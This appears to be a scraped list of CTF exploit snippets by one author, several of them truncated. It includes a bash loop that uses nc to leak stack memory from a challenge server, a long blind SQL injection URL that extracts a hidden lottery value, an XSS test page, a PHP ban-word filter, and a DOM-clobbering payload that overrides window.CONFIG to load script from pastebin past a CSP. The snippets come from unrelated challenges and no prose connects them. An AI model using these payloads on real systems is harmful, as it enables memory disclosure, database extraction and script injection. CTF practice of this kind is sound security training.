terjanq

#!/usr/bin/env python2
# encoding: utf-8
from pwn import *
from Crypto.Util.number import long_to_bytes


def chinese_remainder(n, a):
    sum = 0
    prod = reduce(lambda a, b: a*b, n)
 

terjanq

# The main issue was that nullbytes were being blocked so we needed a chunk of stack
# that did not contain any null bytes
# The trick was to put a huge body into the POST /api/flag request so it will fill most of the stack with printable characters
# And then just leaking it

#In terminal 1 run (leaking the stack to the file, looking for Location: header
for j in {0..10}; do for i in {0..20}; do 
   printf "POST /quotes/new HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 9000\r\n\r\nattribute=&quote=$$$$$$$$$$$" 
   | nc quotables.pwni.ng 1337 -q 1 >> aaa &; done; sleep 1; done

terjanq

<!DOCTYPE html SYSTEM "3b16c602b53a3e4fc22f0d25cddb0fc4d1478e0233c83172c36d0a6cf46c171ed5811fbffc3cb9c3705b7258179ef11362760d105fb483937607dd46a6abcffc">
<html>
	<head>
		<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/skeleton/2.0.4/skeleton.min.css">
		<script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/sha512.js"></script>
		<script src="../scripts/DOMValidator.js"></script>
	</head>
	<body>
		<h1>test_post</h1>
		<p><script>alert('pwned')</script></p>

terjanq

function checksum (element) {
	var string = ''
	string += (element.attributes ? element.attributes.length : 0) + '|'
	for (var i = 0; i < (element.attributes ? element.attributes.length : 0); i++) {
		string += element.attributes[i].name + ':' + element.attributes[i].value + '|'
	}
	string += (element.childNodes ? element.childNodes.length : 0) + '|'
	for (var i = 0; i < (element.childNodes ? element.childNodes.length : 0); i++) {
		string += checksum(element.childNodes[i]) + '|'
	}

terjanq

SQLite Voting

function is_valid($str) {
  $banword = [
    // dangerous chars
    // " % ' * + / < = > \ _ ` ~ -
    "[\"%'*+\\/<=>\\\\_`~-]",
 // whitespace chars

terjanq

https://glotto.web.ctfcompetition.com/?order0=date`=(SELECT+1337+FROM+(SELECT+@ll:=CAST(if(@f1<0,@f1%2b43,@f1)%2b36*if(@f2<0,@f2%2b43,@f2)%2b1296*if(@f3<0,@f3%2b43,@f3)%2b46656*if(@f4<0,@f4%2b43,@f4)%2b1679616*if(@f5<0,@f5%2b43,@f5)%2b60466176*if(@f6<0,@f6%2b43,@f6)%2b2176782336*if(@f7<0,@f7%2b43,@f7)%2b78364164096*if(@f8<0,@f8%2b43,@f8)%2b2821109907456*if(@f9<0,@f9%2b43,@f9)%2b101559956668416*if(@f10<0,@f10%2b43,@f10)AS+UNSIGNED)%2bCAST(3656158440062976*if(@f11<0,@f11%2b43,@f11)AS+UNSIGNED)%2bCAST(131621703842267136*if(@f12<0,@f12%2b43,@f12)AS+UNSIGNED)FROM+(SELECT+@f1:=ORD(SUBSTR(@lotto,1,1))-65)z1,(SELECT+@f2:=ORD(SUBSTR(@lotto,2,1))-65)z2,(SELECT+@f3:=ORD(SUBSTR(@lotto,3,1))-65)z3,(SELECT+@f4:=ORD(SUBSTR(@lotto,4,1))-65)z4,(SELECT+@f5:=ORD(SUBSTR(@lotto,5,1))-65)z5,(SELECT+@f6:=ORD(SUBSTR(@lotto,6,1))-65)z6,(SELECT+@f7:=ORD(SUBSTR(@lotto,7,1))-65)z7,(SELECT+@f8:=ORD(SUBSTR(@lotto,8,1))-65)z8,(SELECT+@f9:=ORD(SUBSTR(@lotto,9,1))-65)z9,(SELECT+@f10:=ORD(SUBSTR(@lotto,10,1))-65)z10,(SELECT+@f11:=ORD(SUBSTR(@

terjanq

<!doctype html><meta charset=utf-8>
<title>SecurityMB's Security Challenge</title>
<style>
* {
  font-family: monospace;
}  
textarea {
  width:100%;
  height:90px;

terjanq

const sanitized = DOMPurify.sanitize(input.value);

const html = `
  <meta http-equiv=Content-Security-Policy content="script-src https://pastebin.com/how-can-i-escape-this/ 'nonce-xyz' https://securitymb.github.io/xss/1/modules/v20190816/">
  <h1>Homepage!</h1>
  <p>Welcome to my homepage! Here are some info about me:</p>
  ${sanitized}
  <script nonce=xyz src="./main.js"><\/script>
`;

terjanq

window.CONFIG = window.CONFIG || {
  version: "v20190816",
  test: false,
  appName: "XSS Challenge",
}

function loadModule(moduleName) {
  const scriptSrc = new URL(document.currentScript.src);
  let url = '';
  

terjanq

<a href="https://pastebin.com" id="testPath"></a>
<a id="CONFIG" name=test></a>
<a id="CONFIG" name="version" href="cid:/../../../../how-can-i-escape-this%2f..%2fraw/LiE18yqs?"></a>